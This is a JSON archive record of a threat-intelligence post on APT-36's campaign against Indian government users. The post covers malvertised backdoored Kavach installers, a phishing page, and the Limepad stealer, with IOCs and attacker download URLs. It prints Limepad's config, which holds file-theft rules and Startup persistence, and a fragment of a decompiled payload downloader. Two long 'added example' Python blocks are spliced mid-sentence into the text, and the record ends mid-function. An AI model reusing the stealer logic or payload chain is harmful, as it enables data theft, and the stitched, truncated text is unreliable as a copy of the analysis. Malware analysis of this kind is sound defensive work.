{
	"id": "48a06cbb-1291-42b6-a997-6a43b5f38d9f",
	"created_at": "2026-04-06T00:13:41.755367Z",
	"updated_at": "2026-04-10T03:36:50.433451Z",
	"deleted_at": null,
	"sha1_hash": "ca2c5d672b73fcdcdabf713bd3d472aa160deac9",
	"title": "Indian Governmental Organizations Targeted by APT-36",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2570920,
	"plain_text": "Indian Governmental Organizations Targeted by APT-36\r\nBy Sudeep Singh\r\nPublished: 2022-11-03 · Archived: 2026-04-05 13:36:32 UTC\r\nSummary\r\nAPT-36 (also known as Transparent Tribe) is an advanced persistent threat group attributed to Pakistan that primarily targets users working at Indian government organizations. Zscaler ThreatLabz has been closely monitoring the activities of this group throughout 2022. Our tracking efforts have yielded new intelligence about this APT group that has not previously been documented.\r\nIn this blog, we describe how this group abuses Google advertisements (malvertising) to distribute backdoored versions of the Kavach multi-factor authentication (MFA) application. We shed light on the complete details of the attack chain, which have not been previously shared in the public domain. This threat group has also conducted very low-volume credential harvesting attacks masquerading as official Indian government websites and luring unsuspecting users into entering their credentials.\r\nWe also describe the functionality of a completely new data exfiltration tool that we discovered being used by the APT-36 group. We've dubbed this tool \"Limepad.\"\r\nKey points\r\nAPT-36 is a Pakistan-based advanced persistent threat group which has specifically targeted employees of Indian government related organizations.\r\nThis group has remained active throughout 2022 using various techniques such as malvertising and credential phishing attacks.\r\nAPT-36 has evolved its tactics, techniques and procedures (TTPs), incorporating new distribution methods and new tools.\r\nThe threat actor registered multiple new domains hosting web pages masquerading as the official Kavach app download portal.\r\nThey abused the Google Ads paid search feature to push the malicious domains to the top of Google search results for users in India.\r\nBeginning August 2022, the group started using a new data exfiltration tool which we have named Limepad. This tool was previously undocumented.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 1 of 24\n\nWhile most binaries used by APT-36 in this campaign will execute only if the user’s machine is configured with the India time zone (IST), we also found 2 binaries built from the same code base whose time zone check accepts both India and Sri Lanka. Since India and Sri Lanka share the same UTC+5:30 offset, we consider this check redundant.\r\nCredential harvesting attacks were used to spoof the National Informatics Center’s Kavach login page with the goal of stealing credentials of government employees.\r\nSeveral instances involved malicious binaries compiled using PyInstaller and sent packaged inside VHDX archives.\r\nAttack flow\r\nFigure 1 illustrates the end-to-end attack chain used to distribute backdoored Kavach multi-factor authentication (MFA) applications. 
Each part of this attack chain is explained in more detail in the later sections of the blog.\r\nFigure 1: Malvertising campaign used to distribute backdoored Kavach MFA apps\r\nDistribution mechanism\r\nMalvertising\r\nThe malvertising aspect of the APT-36 group has not been previously documented, so in this blog we shed some light on how the threat actor lures Indian government users into downloading backdoored Kavach multi-factor authentication (MFA) applications.\r\nThe threat actor routinely registered new domains and hosted web pages impersonating the official Kavach application download portal. It then abused the Google Ads paid search feature to push the attacker-registered fake websites to the top of the search results returned by Google for Kavach-related keywords such as “Kavach download” and “Kavach app” when searched from India.\r\nSeveral of these fake Kavach websites were promoted this way throughout 2022. 
On average, the attacker promoted each website for a period of one month before cycling to the next one.\r\nFigure 2 shows a calendar highlighting the different times at which the threat actor was abusing Google Ads to promote the corresponding malicious sites.\r\nFigure 2: Calendar showing when the Google ads were run by APT-36\r\nThe complete list of malicious websites impersonating the Kavach portal is given in the IOCs section.\r\nFigures 3 and 4 show two examples of how the malicious search result ads looked at the time they were live.\r\nFigure 3: Google advertisement to promote kavach-app[.]com\r\nFigure 4: Google advertisement to promote kavach-app[.]in\r\nFigure 5 shows a web page impersonating the Kavach application download portal. The threat actor used WordPress to host these web pages, and the theme remained consistent across all the malicious pages.\r\nFigure 5: Attacker-registered site masquerading as Kavach app download portal\r\nThird party application stores\r\nIn addition to this, we also discovered that this threat group controls certain third party application stores which offer downloads for various applications. One such example is the acmarketsapp[.]com store. 
While at first this site seems benign and appears to offer downloads for generic applications only, we noticed that the threat actor added a few posts offering downloads of Indian government related applications such as Kavach and Hamraaz.\r\nUpon closer inspection and after monitoring this website over a period of time, we uncovered the following new TTPs.\r\nUpdating download links\r\nThis app store is used as a gateway to redirect users to attacker-registered domains hosting the backdoored versions of the Kavach application. Each time the threat actor registered a new malicious website, they would update the download link on the app store to point to the latest attacker-registered site.\r\nTo understand this better, we took snapshots of this website at different points in time in 2022. Using the web archive, it can be seen in Figure 6 that in May 2022 the download link for Kavach on this app store pointed to kavach-app[.]com (a confirmed attacker-registered domain used in the campaign).\r\nFigure 6: Snapshot of malicious link on acmarketsapp[.]com in May 2022\r\nA few months later, in October 2022, the threat actor updated the link to point to another malicious site (kavachauthentication.blogspot[.]com), as shown in Figure 7.\r\nFigure 7: Snapshot of malicious link on acmarketsapp[.]com in October 2022\r\nMalvertising\r\nThe app store acmarketsapp[.]com is itself pushed to the top of Google search results for certain search keywords from India by abusing the Google Ads paid search feature, as described earlier.\r\nBy combining these techniques, APT-36 can operate these third party app stores as a gateway to redirect unsuspecting users to 
their malicious sites hosting the latest backdoored variants of Indian government applications.\r\nTechnical analysis\r\nA new data exfiltration tool - LimePad\r\nWe recently identified a new and previously undocumented data exfiltration tool used by this APT group. It is distributed as a Python-based application packaged inside a VHDX file. Based on the unique strings present in the first iteration of this stealer, we have named it LimePad.\r\nIn this blog, we are sharing some of the key functionality of this new tool. A more in-depth technical analysis of this tool will be published as a follow-up blog, since we are still investigating the group's activities.\r\nSimilar to some of the other malicious binaries used by the SideCopy APT group in the past, this new tool is also a PyInstaller-based payload. We found 2 unique examples of the new tool in the wild, both of which were distributed inside very large VHDX files, each greater than 60 MB in size.\r\nThe main purpose of this new tool is to continuously upload any new file of interest from the victim's machine to the attacker's server. It synchronizes this file stealing operation between the victim's machine and the attacker's server by maintaining a local custom SQLite database. This database holds the latest records of all files which are uploaded, queued or newly modified, ensuring that any new files or modifications to existing local files are synced to the remote server.\r\nTime zone check\r\nBefore starting any malicious activity, it checks whether the keyword \"india\" is present in the time zone configuration of the machine. 
Due to this, the payload will execute only on machines configured with the India time zone.\r\nOnce it confirms that the user is located in India, it downloads a decoy PDF from the attacker’s server, which is displayed to the victim as a social engineering lure.\r\nWe analyzed the objects in the decoy PDF file to recover the metadata corresponding to the generation of the PDF, and we uncovered a key indicator which further helped us correlate this activity to APT-36 with high confidence.\r\nFigure 8 shows the metadata, which indicates that this PDF was created with the author name “Apolo Jones” and that Microsoft Word 2016 was used to generate the PDF.\r\nFigure 8: metadata of the decoy PDF file\r\nThis is the same string present in the PDB path of multiple backdoored variants of the Kavach application used by APT-36 in 2022.\r\nOne such example is the backdoored Kavach binary with MD5 hash: 6b552512c1b6479d8a8ae526663af864\r\nPDB path: C:\\Users\\Apolo Jones\\source\\repos\\Kavach\\obj\\Release\\Kavach.pdb\r\nKey functionalities and configuration of Limepad\r\nThis data exfiltration tool is modular and contains many custom Python libraries developed by the attacker to support the main functionality of LimePad. There is also a config file called \"control\" which LimePad uses for its settings. The complete config file is available in the Appendix. Below we give a brief overview of the config fields, which helps to understand the features and functionality of this stealer at a high level.\r\nThe VERSION field is configured as \"0.1-18\". 
This indicates that the tool is in a very early stage of development by the threat actor.\r\nUSERFILE defines the name of the local SQLite database which is used to keep track of the file sync operations. In the first version of this tool it was configured as \"Limepad.db\", which is why we have named this tool \"Limepad\".\r\nThe fields STARTDATA, LOCKDOORS and DOORS are used to create a Windows URL shortcut file for persistence. This URL shortcut file is placed in the Windows Startup directory with the name \"Limepad.dll\" (DOORS lists both .dll and .url as candidate extensions), and it points to the local file path of the malicious payload (sys.executable in the config), as shown below.\r\n[InternetShortcut]\r\nURL=file:///\r\nA similar persistence mechanism was used by another tool in SideCopy APT's arsenal in 2021.\r\nThe SERVERS field is used to configure an array of attacker-controlled C2 servers. In both identified samples, only one C2 server was configured. However, the code supports multiple C2 servers and will cycle through them until it finds a working one.\r\nThe DUSSEN field contains a hex-encoded version of the string \"india\" (696E646961). 
This is what the India time zone check in the main subroutine of Limepad uses before starting any malicious activity.\r\nThe fields DBTABLES, DBTABLES_INDEXES and SYNC_RULES_CONFIG all correspond to the structure and configuration of the tables in the local SQLite database.\r\nFigure 9 shows the structure of the local SQLite database used for synchronizing files between the infected machine and the server.\r\nFigure 9: Structure of the local SQLite database\r\nFigure 10 shows an example of the contents of the SQLite database on an infected VM.\r\nFigure 10: Contents of a database from an infected VM\r\nIt is important to note that \"SYNC_RULES_CONFIG\" contains a set of rules which defines which files the attacker is interested in stealing.\r\nIt has a different set of file extensions configured for HOME, FIXED and REMOVABLE drives. Based on the configured file extensions, it is evident that the threat actor is interested in stealing documents (PDF, text and MS Office files, including Access databases), local email databases (DBX format) and drawing files with extensions such as DWG and DXF. These drawing file extensions correspond to \"AutoCAD\" or computer-aided design vector files.\r\nNetwork communication\r\nBelow are the main steps in the network communication of LimePad. It is important to note that in all cases the user-agent used in network communication is the default one set by the Python library, in this case \"Python-urllib/2.7\". This might change in future, since the attacker can configure a custom user-agent to blend in with legitimate browser traffic.\r\nAlso, in each request to the server, an HTTP request header field called \"Auth_Token\" is present. This is used to authenticate with the C2 server. 
This value is the same as the password which is also sent in the HTTP request body.\r\nThis 32-character password is generated by base64-encoding 30 random bytes from os.urandom() and keeping the first 32 characters, using the following code.\r\npassword = base64.urlsafe_b64encode(os.urandom(30))[:32]\r\nFigure 11 below shows the sequence of network requests sent by the data exfiltration tool.\r\nFigure 11: network traffic from the data exfiltration tool\r\nBelow is a brief description of the different stages of network requests.\r\nServer check\r\nSends a GET request to the file bind.php on the server. Once the server responds with \"pong!\", the configured server is considered to be working.\r\nRegistration of infected machine with the server\r\nSends a POST request to the file \"information.php\" on the server with the credentials used to register the infected machine. The username and password are sent both in the HTTP POST request body and in HTTP request headers. The \"Username\" and \"Auth_Token\" request header fields correspond to the username and password respectively.\r\nPOST body format is: USERNAME=\u0026PASSWORD=\r\nThis is followed by a GET request to \"information.php\" to confirm user registration.\r\nUploading files to the server\r\nEach file upload request is an HTTP POST request to the file \"adjustfile.php\" on the server. The local file path is included in the URL. The contents of the file are uploaded as-is, without any encryption or encoding applied by the tool.\r\nMiscellaneous threat intel\r\nAs we indicated earlier, we are still investigating this case. We obtained the list of all the infected machines registered with the attacker’s server. Figure 12 below shows a preview of the latest information. 
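The sync rules and SQLite layout described under "Key functionalities and configuration of Limepad" above, reconstructed as an added example for analysts. This is not Limepad's code and is not from the original post: it builds the database from the DBTABLES and DBTABLES_INDEXES dictionaries as printed in the Appendix, parses the SYNC_RULES_CONFIG rule strings, and queues a constructed file list, so the reader can see exactly which files a given configuration would select for upload. The rule grammar (quoted globs joined by 'or'), the SQL index naming and the sample file list are assumptions; the attacker's 'regulator' module is not reproduced, and the REMOVABLE rule is omitted because it is cut off on the page.

```python
# Added example: rebuild Limepad's SQLite layout from its config dictionaries and
# evaluate the SYNC_RULES_CONFIG expressions. Not the stealer's own code; the rule
# grammar, index naming and sample files are assumptions made for this example.
import fnmatch
import re
import sqlite3

QUEUED, SYNCING, SYNCED, IGNORED = range(4)  # FILEFLAG values from the published config

# Table and rule definitions as printed in the Appendix (the REMOVABLE rule is cut
# off on the page, so it is omitted here).
DBTABLES = {
    'file': [('path', 'VARCHAR'), ('filename', 'VARCHAR'), ('size', 'INT'),
             ('state', 'INT'), ('modified', 'REAL'), ('created', 'REAL'),
             ('queuepriority', 'INT'), ('defertill', 'INT DEFAULT 0'),
             ('rpath', 'VARCHAR DEFAULT NULL')],
    'syncdirs': [('path', 'VARCHAR'), ('rule', 'VARCHAR')],
    'config': [('key', 'VARCHAR'), ('value', 'VARCHAR')],
}
DBTABLES_INDEXES = {'file': ('queuepriority', 'unique: path, filename'),
                    'config': ('unique: key',)}
SYNC_RULES_CONFIG = {
    'HOME': " '*.pdf' or '*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dxf' or '*.dbx' ",
    'FIXED': " '*.pdf' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dbx' ",
}


def schema_sql(tables=DBTABLES, indexes=DBTABLES_INDEXES):
    """Turn the config dictionaries into CREATE statements (index names are assumed)."""
    stmts = []
    for table, cols in tables.items():
        coldefs = ', '.join('"%s" %s' % (name, ctype) for name, ctype in cols)
        stmts.append('CREATE TABLE "%s" (%s)' % (table, coldefs))
        for spec in indexes.get(table, ()):
            unique = spec.startswith('unique:')
            idx_cols = [c.strip() for c in spec.split(':', 1)[-1].split(',')]
            stmts.append('CREATE %sINDEX idx_%s_%s ON "%s" (%s)' % (
                'UNIQUE ' if unique else '', table, '_'.join(idx_cols), table,
                ', '.join('"%s"' % c for c in idx_cols)))
    return stmts


def compile_rule(rule):
    """Parse a rule such as " '*.pdf' or '*.doc*' " into its glob list.
    Only the quoted-globs-joined-by-'or' form seen in the config is accepted."""
    globs = re.findall(r"'([^']+)'", rule)
    leftovers = [t.strip() for t in re.split(r"'[^']+'", rule) if t.strip() not in ('', 'or')]
    if not globs or leftovers:
        raise ValueError('unsupported rule syntax: %r' % rule)
    return globs


def wanted(filename, globs):
    """Case-insensitive match, since Windows filenames are case-insensitive."""
    return any(fnmatch.fnmatchcase(filename.lower(), g.lower()) for g in globs)


def queue_files(conn, drive_kind, files):
    """Insert every matching (path, filename, size) as a QUEUED row; return how many were added.
    The unique (path, filename) index makes repeated scans idempotent."""
    globs = compile_rule(SYNC_RULES_CONFIG[drive_kind])
    before = conn.execute('SELECT COUNT(*) FROM "file"').fetchone()[0]
    for path, filename, size in files:
        if wanted(filename, globs):
            conn.execute(
                'INSERT OR IGNORE INTO "file" (path, filename, size, state, modified, created, queuepriority) '
                'VALUES (?, ?, ?, ?, 0, 0, 0)', (path, filename, size, QUEUED))
    return conn.execute('SELECT COUNT(*) FROM "file"').fetchone()[0] - before


# Constructed directory listing (path, filename, size) for the demonstration.
SAMPLE_FILES = [
    ('C:\\Users\\analyst\\Documents', 'tender_2022.pdf', 120000),
    ('C:\\Users\\analyst\\Documents', 'site_plan.DWG', 900000),
    ('C:\\Users\\analyst\\Documents', 'notes.txt', 300),
    ('C:\\Users\\analyst\\Pictures', 'holiday.jpg', 2500000),
    ('C:\\Users\\analyst\\Mail', 'Inbox.dbx', 50000),
]


def demo(drive_kind='HOME'):
    """Create the database in memory, queue the sample files twice, and
    return (added on first pass, added on second pass, queued filenames)."""
    conn = sqlite3.connect(':memory:')
    for stmt in schema_sql():
        conn.execute(stmt)
    added = queue_files(conn, drive_kind, SAMPLE_FILES)
    added_again = queue_files(conn, drive_kind, SAMPLE_FILES)  # duplicates are ignored
    rows = conn.execute('SELECT filename FROM "file" WHERE state = ? ORDER BY filename', (QUEUED,))
    return added, added_again, [r[0] for r in rows]


if __name__ == '__main__':
    for kind in ('HOME', 'FIXED'):
        print(kind, demo(kind))
```

The difference between the two drive kinds is visible in the output: the HOME rule also takes plain text files, so notes.txt is queued for HOME but not for FIXED, while the DWG file is taken in both because the match is case-insensitive.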
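Detection logic for the Limepad artifacts described above, as an added example that is not from the original post or from any vendor's detection content: it runs over a few constructed proxy log lines to flag the bind.php / information.php / adjustfile.php sequence sent with an Auth_Token header and a Python-urllib user-agent, and classifies Startup-folder items to catch the InternetShortcut persistence file. The tab-separated log format, the host names and the sample values are assumptions made for the example.

```python
# Added example: detection logic for the Limepad network pattern and Startup
# persistence described above. Not from the original post; the tab-separated log
# format, host names and sample values are assumptions made for this example.
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log: time, client, method, URL, user-agent, request header names.
SAMPLE_LOG = """\
2022-09-01T09:10:01Z\t10.1.2.3\tGET\thttp://c2.example.invalid/bind.php\tPython-urllib/2.7\tHost;User-Agent;Auth_Token
2022-09-01T09:10:02Z\t10.1.2.3\tPOST\thttp://c2.example.invalid/information.php\tPython-urllib/2.7\tHost;User-Agent;Username;Auth_Token;Content-Type;Content-Length
2022-09-01T09:10:02Z\t10.1.2.3\tGET\thttp://c2.example.invalid/information.php\tPython-urllib/2.7\tHost;User-Agent;Username;Auth_Token
2022-09-01T09:10:05Z\t10.1.2.3\tPOST\thttp://c2.example.invalid/adjustfile.php?C:/Users/victim/Documents/tender.pdf\tPython-urllib/2.7\tHost;User-Agent;Auth_Token;Content-Length
2022-09-01T09:11:00Z\t10.1.2.4\tGET\thttps://pypi.org/simple/requests/\tPython-urllib/3.10\tHost;User-Agent
2022-09-01T09:12:00Z\t10.1.2.5\tPOST\thttps://intranet.example.invalid/information.php\tMozilla/5.0\tHost;User-Agent;Cookie;Content-Type
"""

# Endpoint basename -> stage of the Limepad exchange.
STAGES = {'bind.php': 'server_check', 'information.php': 'registration', 'adjustfile.php': 'upload'}


def parse_line(line):
    ts, client, method, url, ua, headers = line.split('\t')
    return {'ts': ts, 'client': client, 'method': method, 'url': url, 'ua': ua,
            'headers': {h.strip().lower() for h in headers.split(';') if h.strip()}}


def classify(rec):
    """Return the Limepad stage this request matches, or None.
    Every Limepad request carries Auth_Token; registration also carries Username;
    uploads are POSTs whose query string holds the local file path."""
    parts = urlsplit(rec['url'])
    stage = STAGES.get(parts.path.rsplit('/', 1)[-1].lower())
    if stage is None or 'auth_token' not in rec['headers']:
        return None
    if stage == 'registration' and 'username' not in rec['headers']:
        return None
    if stage == 'upload' and not (rec['method'] == 'POST' and parts.query):
        return None
    return stage


def detect(log_text):
    """Group matched requests by client; alert on any upload or on two distinct stages."""
    stages_by_client = defaultdict(set)
    urllib_ua = defaultdict(bool)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        stage = classify(rec)
        if stage:
            stages_by_client[rec['client']].add(stage)
            urllib_ua[rec['client']] |= rec['ua'].startswith('Python-urllib/')
    return {c: {'stages': sorted(s), 'python_urllib_ua': urllib_ua[c]}
            for c, s in stages_by_client.items() if 'upload' in s or len(s) >= 2}


def startup_shortcut_verdict(filename, content):
    """Classify one item from the Startup folder.
    'limepad'    - named Limepad.dll or Limepad.url and is an InternetShortcut to a local file
    'suspicious' - any InternetShortcut whose URL= points at file:///, whatever the name
    None         - anything else (web shortcuts, non-shortcut files)."""
    lines = [l.strip() for l in content.splitlines() if l.strip()]
    if not lines or lines[0].lower() != '[internetshortcut]':
        return None
    url = next((l[4:] for l in lines[1:] if l.lower().startswith('url=')), '')
    if not url.lower().startswith('file:///'):
        return None
    if filename.lower() in ('limepad.dll', 'limepad.url'):
        return 'limepad'
    return 'suspicious'


def scan_startup(listing):
    """listing: {filename: file content} read from the Startup folder; returns the findings."""
    verdicts = ((name, startup_shortcut_verdict(name, content)) for name, content in listing.items())
    return {name: v for name, v in verdicts if v}


if __name__ == '__main__':
    print(detect(SAMPLE_LOG))
    print(scan_startup({'Limepad.dll': '[InternetShortcut]\r\nURL=file:///C:/Users/v/AppData/Roaming/Limepad/Limepad.exe\r\n'}))
```

The Auth_Token header is the strongest single signal, since it is not a standard header and is sent on every request; the user-agent is kept as a secondary field only, because the text notes the attacker can change it.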
By looking at the usernames of the infected machines, it was further confirmed to us that only users in India were infected.\r\nFigure 12: List of infected machines registered with the attacker’s server\r\nKavach payload analysis\r\nAs mentioned above in the distribution mechanism section, this threat actor uses various malvertising methods to lure unsuspecting Indian government employees into downloading a backdoored version of the Kavach multi-factor authentication (MFA) application.\r\nFor the purpose of technical analysis we consider the fake installer with the MD5 hash: faeb19cd668de953afd6f2c953251665\r\nStage-1: Fake Installer\r\nThe fake installer is a .NET binary which masquerades as a legitimate Kavach application installer and uses fake metadata. Moreover, the binary uses an icon related to the National Informatics Center (NIC), an Indian government department under the Ministry of Electronics and Information Technology.\r\nOn execution, the binary performs the following operations:\r\n1. Performs the time zone check and continues only if the time zone matches Indian Standard Time (IST).\r\n2. Extracts and drops the legitimate Kavach installer in the path \"C:\\ProgramData\\Kavach-Auth\\\". The installer is extracted from the resource section of the binary.\r\n3. Downloads the Stage-2 payload from the URL \"http://139.59.79[.]86/hardwell.mp3\" and drops it in the path \"C:\\ProgramData\\Kavach-Auth\\hardwell.mp3\"\r\n4. Executes the dropped legitimate Kavach installer\r\n5. Moves the dropped Stage-2 payload to the path \"C:\\ProgramData\\Kavach-Auth\\archiveviewer.scr\"\r\n6. 
Executes the dropped Stage-2 payload\r\nStage-2: PyInstaller compiled binary\r\nThe Stage-2 payload is a Python script compiled to an executable using PyInstaller. For analysis we extracted the Python script, which we have included in the Appendix section.\r\nOn execution, the script performs the following major operations:\r\n1. Creates the directory \"c:\\programdata\\WUDFHost\"\r\n2. Creates a log file in the path \"c:\\programdata\\WUDFHost\\logs.txt\" which is updated according to the operations performed during further execution.\r\n3. Performs the time zone check (the script in the Appendix accepts either an India or a Sri Lanka time zone, then additionally checks for an Office15 or Office16 installation directory and branches on whether the OS is 64-bit).\r\n4. Downloads, drops and executes the next stage payload.\r\nFor the next stage payload, if the path \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\" (the .NET Framework 4.x CLR directory) exists, then the payload is downloaded from the URL \"http://139.59.79[.]86/WUDFHost45.zip\" to the path \"c:\\programdata\\WUDFHost45.zip\"; otherwise it is downloaded from the URL \"http://139.59.79[.]86/WUDFHost35.zip\" to the path \"c:\\programdata\\WUDFHost35.zip\".\r\nThe downloaded payload, which is a ZIP file, is extracted to the path “c:\\programdata\\WUDFHost”. For the payload analyzed, the archive contained three components:\r\n1. Executable (WUDFAgent.exe) - The loader binary\r\n2. DLL (oraclenotepad45.dll) - Main backdoor\r\n3. DLL (dotsqueeze.dll) - Helper DLL\r\nStage-3: Loader\r\nThe Stage-2 Python script executes the loader binary. The loader pretends to be a POS application which on execution performs the following operations:\r\n1. Creates a log file in the path \"c:\\programdata\\WUDFHost\\process.txt\"\r\n2. Loads the assembly from the path \"c:\\programdata\\WUDFHost\\oraclenotepad45.dll\"\r\n3. Creates a fake file in the path \"c:\\programdata\\Expense_Account_Hierarchy.csv\" and writes fake information to it. 
The information written is extracted from the resource section.\r\n4. Passes execution control to the loaded assembly\r\nStage-4: Backdoor\r\nThe assembly loaded by the loader is the main backdoor of the infection chain. As with the Python script, we will not cover the full technical analysis of the backdoor payload here, since it is already covered in public blog posts; in brief, it contains the following functionality:\r\n1. Taking snapshots\r\n2. Downloading new payloads and executing them\r\n3. Creating persistence\r\n4. Exfiltrating user and system information\r\n5. Exfiltrating file and directory information\r\nThe backdoor also uses a helper DLL to which the malware author has delegated functionality such as downloading files from the network, writing files to disk and creating new processes.\r\nCredential harvesting attack\r\nOne of the key targets of APT-36 is the Indian government, and it targets government users with various Kavach related themes, including credential harvesting attacks. 
These credentials can further be re-used by the threat actor to gain access to government related infrastructure.\r\nA domain with the name nic-updates[.]in was registered on 25th August 2022, and it impersonated the official login page of NIC (National Informatics Center).\r\nThis domain redirected to the malicious login page only when accessed from an Indian IP address; otherwise it redirected to the legitimate official domain of NIC, nic.in. A consequence of this geofencing is that analysts or sandboxes outside India only ever see the benign redirect.\r\nFigure 13 shows the credential phishing page.\r\nFigure 13: Credential phishing page impersonating Kavach NIC\r\nIt is important to note that the phishing URL was well-crafted, as it mimicked the full URL path of the legitimate Kavach NIC login page.\r\nFake login page URL:\r\nhxxps://kavach.mail.nic-updates[.]in/mfid/secureLogin_showSecureLogin.action#!\r\nLegit login page URL:\r\nhxxps://kavach.mail.gov[.]in/mfid/secureLogin_showSecureLogin.action#!\r\nThe phishing page sent the stolen credentials using an HTTP POST request to a file, error.php, hosted on the attacker’s server.\r\nThe attacker’s server was using Zimbra, and it even had an open directory hosted at the URL:\r\nhxxps://kavach.mail.nic-updates[.]in/mfid/secureLogin_showSecureLogin.action/web/\r\nFigure 14 shows the contents of the open directory.\r\nFigure 14: Open directory on the server hosting the Kavach phishing page\r\nThe image file kavach.jpg in the above open directory stood out based on its file creation date. 
We pivoted on this image file’s hash and observed that the same image was also referenced from kavach-app[.]com (a domain which we previously attributed to the APT-36 group).\r\nWe also identified another phishing site (kavachmail-govin.rf[.]gd) used by this group with the same theme and code base.\r\nZscaler detection status\r\nZscaler’s multilayered cloud security platform detects indicators at various levels, as seen here:\r\nWin32.Payload.Limepad\r\nWin64.Payload.Limepad\r\nWin32.Downloader.CrimsonRat\r\nWin32.Backdoor.SideCopy\r\nHTML.Phish.TransparentTribe\r\nConclusion\r\nAPT-36 continues to be one of the most prevalent advanced persistent threat groups focused on targeting users working in Indian governmental organizations. As described in this blog, they leverage various tactics to lure victims.\r\nThis group has continued evolving its tactics, techniques and procedures (TTPs) while adding new tools to its arsenal. Applications used internally at Indian government organisations are a popular choice of social engineering theme for APT-36. 
Users should exercise caution while downloading applications and always ensure that they download applications only from official sources.\r\nSince APT-36 leverages malvertising to hijack Google search results, we advise users to be extra careful when clicking on links in Google search results and to always verify that they are indeed visiting the official website.\r\nWe continue to closely monitor the latest developments of this APT group to ensure that our customers are protected against these threats.\r\nIndicators of compromise\r\nLimepad C2 domains\r\nncloudup[.]com\r\ngcloudsvc[.]com\r\nCredential harvesting sites\r\nnic-updates[.]in\r\nkavachmail-govin[.]rf[.]gd\r\nAttacker-registered domains spoofing Kavach site\r\nkavach-app[.]com\r\nkavachguide[.]com\r\nkavach-app[.]in\r\nget-kavach[.]in\r\ngetkavach[.]com\r\nkavachsupport[.]com\r\nkavachdownload[.]in\r\nkavachauthentication.blogspot[.]com\r\nPost-infection IOCs\r\n139.59.79[.]86\r\n139.59.79[.]86/song.mp3\r\n139.59.79[.]86/OneDriveHandler45_bf.zip\r\n139.59.79[.]86/OneDriveHandler45.zip\r\n139.59.79[.]86/C2L!Dem0\u0026PeN/A@llPack3Ts/Cert.php\r\nwzxdao[.]com\r\nwzxdao[.]com/onedrivehandlerx86.zip\r\nwzxdao[.]com/OnrDriveHandlerx86.zip\r\nDecoy file URLs\r\nhxxp://139.59.23[.]88/confirmation_id.pdf\r\nhxxps://ncloudup[.]com/trendmic/details.pdf\r\nhxxp://wzxdao[.]com/resultupdate.jpg\r\nhxxp://139.59.79[.]86/Pictures.jpg\r\nFile hashes\r\nMD5 hash   Filename\r\n123b180ed44531bfbac27c6eb0bbe01d Update Portal.vhdx\r\n3817590cf8bec4a768bb84405590272f Student online update.exe\r\n0ed6451ffe34217e44355706f4900ecc NvidiaUpdate (2).scr\r\n94daa776792429d1cb65edc1d525e2fc Student 
detail.vhdx\r\nc195d6bb06c93b94d39e5c1a2dfc6792 Confirmation_ID.vhdx\r\n889c5c98e88c4889220617f57f5480f7 details.exe\r\nac3f2c8563846134bb42cb050813eac8 Confirmation_ID.exe\r\nAppendix\r\nLimepad config file\r\nimport os, logging\r\nfrom regulator import FileMatcher as r\r\nimport sys\r\nQUERY = []\r\nUSERHOME = os.path.join(os.environ['HOMEDRIVE'], os.environ['HOMEPATH'])\r\nclass FILEFLAG:\r\n    QUEUED, SYNCING, SYNCED, IGNORED = range(4)\r\nVERSION = '0.1-$Revision: 18 $'\r\nVERSION = VERSION.replace('$', '').replace('Revision: ', '').strip()\r\nSTARTDATA = os.path.join(os.environ['APPDATA'], 'Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Limepad')\r\nROOTDATA = os.path.join(os.environ['APPDATA'], 'Limepad')\r\nUSERFILE = 'Limepad.db'\r\nUSERFILE = os.path.join(ROOTDATA, USERFILE)\r\nLOGFILE = 'Limepad.log'\r\nLOGFILE = os.path.join(os.environ['APPDATA'], LOGFILE)\r\nTEMP_UPLOAD_FOLDER = os.path.join(ROOTDATA, 'tup')\r\nLOCKDOORS = 'URL=file:///' + sys.executable\r\nDOORS = ['.dll', '.url']\r\nSERVERS = []\r\nDUSSEN = '696E646961'\r\nSERVER_PUBKEY = ''\r\nDBTABLES = {'file': [('path', 'VARCHAR'), ('filename', 'VARCHAR'), ('size', 'INT'), ('state', 'INT'), ('modified', 'REAL'), ('created', 'REAL'), ('queuepriority', 'INT'), ('defertill', 'INT DEFAULT 0'), ('rpath', 'VARCHAR DEFAULT NULL')],\r\n            'syncdirs': [('path', 'VARCHAR'), ('rule', 'VARCHAR')],\r\n            'config': [('key', 'VARCHAR'), ('value', 'VARCHAR')]}\r\nDBTABLES_INDEXES = {'file': ('queuepriority', 'unique: path, filename'), 'config': ('unique: key', )}\r\nSYNC_RULES_CONFIG = {'HOME': r(\" '*.pdf' or '*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dxf' or '*.dbx' \"),\r\n                     'FIXED': r(\" '*.pdf' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dbx' \"),\r\n                     # the REMOVABLE rule is cut off after \"size\" in the published config; the closing of the dict is missing with it\r\n                     'REMOVABLE': r(\" size\r\nOPTIMIZED_SEND_BLOCKSIZE = 256000\r\nLOG_LEVEL = logging.WARN\r\nlogging.basicConfig(filename=LOGFILE, level=LOG_LEVEL)\r\nif __name__ == '__main__':\r\n    print globals()\r\nKavach fake installer - Python decompiled code\r\nimport os\r\nfrom win32com.client import Dispatch\r\nimport platform\r\nimport time\r\n#from tzlocal import get_localzone\r\nimport sys\r\nfrom os.path import exists as file_exists\r\nimport urllib\r\nimport time\r\nfrom time import sleep\r\nimport zipfile\r\n#import win32com.client as win32\r\nimport win32com as win32\r\nimport subprocess\r\ndef is_os_64bit():\r\n    return platform.machine().endswith('64')\r\ndef append_me(text):\r\n    with open(\"c:\\programdata\\WUDFHost\\logs.txt\", \"a\") as myfile:\r\n        myfile.write(text)\r\ndef write_me(text):\r\n    if file_exists(\"c:\\programdata\\WUDFHost\\logs.txt\") is True:\r\n        print('bab')\r\n        pass\r\n    else:\r\n        print('damn')\r\n        with open(\"c:\\programdata\\WUDFHost\\logs.txt\", \"w\") as myfile:\r\n            myfile.write(text)\r\ndef create_dir(text):\r\n    